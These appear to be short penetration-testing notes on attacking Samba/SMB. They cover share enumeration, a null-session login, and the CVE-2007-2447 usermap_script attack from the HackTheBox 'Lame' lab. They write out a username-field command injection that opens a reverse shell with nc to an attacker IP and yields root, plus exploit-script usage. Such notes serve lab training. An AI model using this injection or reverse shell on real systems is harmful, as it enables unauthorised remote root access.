# SMB Samba

## Samba

```
smbclient -L 10.x.x.x   ..list shares
smbclient -H 10.x.x.x   ..host detail
rpcclient -U "" 10.x.x.x  ..null login attempt

smbclient //10.x.x.x/ADMIN$
smbclient //10.x.x.x/MyShare -U bob
```

## Username attack

```
> nc -nvlp 1234  ..listener

Send shell metacharacters into the username with a reverse shell payload.
> logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"
> whoami.. root!
```

## Samba usermap script

* Find samba 3.0.20 with nmap
* Look up samba exploits: CVE-2007-2447
* searchsploit samba 3.0.20
* google/download: **usermap\_script.py**
* REF: LameHTB

```
> nc -nvlp 4444  ..listener
> python2 usermap_script.py -h
> python2 usermap_script.py rhost 445 lhost 4444
> whoami .. root!
```

### Python2

```
python3 didnt work
Use python2, pip2, and pysmb
python ImportError No module named smb.SMBConnection

> python2 --version  ..2.7.18
> wget https://bootstrap.pypa.io/get-pip.py
> sudo python2.7 get-pip.py
> which pip2.7   ../usr/local/bin/pip2.7
> pip2.7 install pysmb
```

## REF:

* [EternalBlue](https://pentest.mxhx.org/03-getting-in/eternal-blue)